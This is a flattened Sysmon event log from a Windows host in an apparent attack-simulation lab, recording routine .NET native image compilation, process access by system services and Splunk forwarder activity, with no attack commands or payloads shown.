21:05:20.968{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A210-60D3-5F04-00000000CF01}5872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021458Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:20.906{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A210-60D3-5F04-00000000CF01}5872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021457Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:20.906{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A210-60D3-5F04-00000000CF01}5872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021456Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:20.671{4DB9351A-A20D-60D3-5E04-00000000CF01}3332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\d04-0\System.Activities.Presentation.dll2021-06-23 21:05:20.671 23542300x800000000000000021455Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:20.124{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C607E3EF1AB64DFA4555EF3BE91B7487,SHA256=C8C4E98F93F7A014D88D993C2A9379E5F2107C1A5B60BF7CE19F83CEEE0541B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021479Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:21.906{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=63DE781B8338316706E8E2299CDFA238,SHA256=CE14D976BA03F017DAB243D84C0CE4609571BD977A2B7FBE1E3415DF826D7CA3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021478Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:21.859{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A211-60D3-6404-00000000CF01}4228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021477Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:21.843{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A211-60D3-6404-00000000CF01}4228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021476Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:21.843{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A211-60D3-6404-00000000CF01}4228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021475Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:21.796{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A211-60D3-6304-00000000CF01}1040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021474Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:21.781{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A211-60D3-6304-00000000CF01}1040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021473Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:21.781{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A211-60D3-6304-00000000CF01}1040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021472Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:21.718{4DB9351A-A211-60D3-6204-00000000CF01}2672C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\a70-0\System.AddIn.Contract.dll2021-06-23 21:05:21.718 10341000x800000000000000021471Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:21.687{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A211-60D3-6204-00000000CF01}2672C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021470Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:21.656{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A211-60D3-6204-00000000CF01}2672C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021469Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:21.656{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A211-60D3-6204-00000000CF01}2672C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021468Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:21.609{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A211-60D3-6104-00000000CF01}6988C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021467Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:21.578{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A211-60D3-6104-00000000CF01}6988C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021466Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:21.578{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A211-60D3-6104-00000000CF01}6988C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021465Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:21.468{4DB9351A-A211-60D3-6004-00000000CF01}6340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\18c4-0\System.AddIn.dll2021-06-23 21:05:21.468 354300x800000000000000021464Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:20.101{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61437-false10.0.1.12-8000- 23542300x800000000000000021463Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:21.140{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98EF4B7FE9CCE7E79EF81742ACE2DDAB,SHA256=E4F956A7328F158E40FC922C782F825A0F58FC233B78D7392893A92451AA4E1C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021462Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:21.078{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A211-60D3-6004-00000000CF01}6340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021461Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:21.046{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A211-60D3-6004-00000000CF01}6340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021460Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:21.046{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A211-60D3-6004-00000000CF01}6340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021498Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:22.968{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A212-60D3-6904-00000000CF01}4972C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021497Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:22.937{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A212-60D3-6904-00000000CF01}4972C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021496Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:22.937{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A212-60D3-6904-00000000CF01}4972C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319